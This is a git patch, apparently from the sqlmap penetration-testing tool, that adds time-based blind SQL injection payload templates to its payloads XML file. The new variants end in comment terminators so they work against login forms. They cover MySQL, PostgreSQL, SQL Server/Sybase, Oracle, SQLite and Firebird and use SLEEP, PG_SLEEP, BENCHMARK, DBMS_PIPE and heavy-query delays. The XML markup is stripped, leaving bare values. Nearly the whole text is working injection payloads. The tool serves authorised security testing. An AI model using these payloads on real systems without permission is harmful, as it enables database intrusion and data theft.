From 1b3717c79cf7c1a8d5b8fc69062b25d948cda222 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Wed, 12 Jan 2011 16:20:29 +0000 Subject: [PATCH] Improvement to make time-based blind to work also against login forms --- xml/payloads.xml | 184 +++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 184 insertions(+) diff --git a/xml/payloads.xml b/xml/payloads.xml index 204f4a4e5..aa0c50b49 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -1520,6 +1520,27 @@ Formats: + + MySQL > 5.0.11 AND time-based blind (comment) + 5 + 4 + 1 + 1,2,3 + 1 + AND [RANDNUM]=IF(([INFERENCE]), SLEEP([SLEEPTIME]), [RANDNUM]) + + AND SLEEP([SLEEPTIME]) + # + + + + +
+ MySQL + > 5.0.11 +
+ + MySQL < 5.0.12 AND time-based blind (heavy query) 5 @@ -1539,6 +1560,26 @@ Formats: + + MySQL < 5.0.12 AND time-based blind (heavy query - comment) + 5 + 5 + 1 + 1,2,3 + 1 + AND [RANDNUM]=IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')), [RANDNUM]) + + AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')) + # + + + + +
+ MySQL +
+ + PostgreSQL > 8.1 AND time-based blind 5 @@ -1559,6 +1600,27 @@ Formats: + + PostgreSQL > 8.1 AND time-based blind (comment) + 5 + 5 + 1 + 1,2,3 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) + -- + + + + +
+ PostgreSQL + > 8.1 +
+ + PostgreSQL AND time-based blind (heavy query) 5 @@ -1578,6 +1640,26 @@ Formats: + + PostgreSQL AND time-based blind (heavy query - comment) + 5 + 5 + 1 + 1,2,3 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) + -- + + + + +
+ PostgreSQL +
+ + Microsoft SQL Server/Sybase AND time-based blind (heavy query) 5 @@ -1597,6 +1679,26 @@ Formats: + + Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment) + 5 + 5 + 1 + 1,2,3 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) + -- + + + + +
+ Microsoft SQL Server +
+ + Oracle AND time-based blind 5 @@ -1616,6 +1718,26 @@ Formats: + + Oracle AND time-based blind (comment) + 5 + 5 + 1 + 1,2,3 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) + + AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]', [SLEEPTIME]) + -- + + + + +
+ Oracle +
+ + Oracle AND time-based blind (heavy query) 5 @@ -1635,6 +1757,26 @@ Formats: + + Oracle AND time-based blind (heavy query - comment) + 5 + 5 + 1 + 1,2,3 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1, ALL_USERS T2, ALL_USERS T3, ALL_USERS T4, ALL_USERS T5) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1, ALL_USERS T2, ALL_USERS T3, ALL_USERS T4, ALL_USERS T5) + -- + + + + +
+ Oracle +
+ + SQLite > 2.0 AND time-based blind (heavy query) 5 @@ -1655,6 +1797,27 @@ Formats: + + SQLite > 2.0 AND time-based blind (heavy query - comment) + 5 + 5 + 1 + 1 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END) + + AND [RANDNUM]=LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000)))) + -- + + + + +
+ SQLite + > 2.0 +
+ + Firebird AND time-based blind (heavy query) 5 @@ -1674,6 +1837,27 @@ Formats: >= 2.0 + + + Firebird AND time-based blind (heavy query - comment) + 5 + 5 + 1 + 1 + 1 + AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3),[RANDNUM]) + + AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3) + -- + + + + +
+ Firebird + >= 2.0 +
+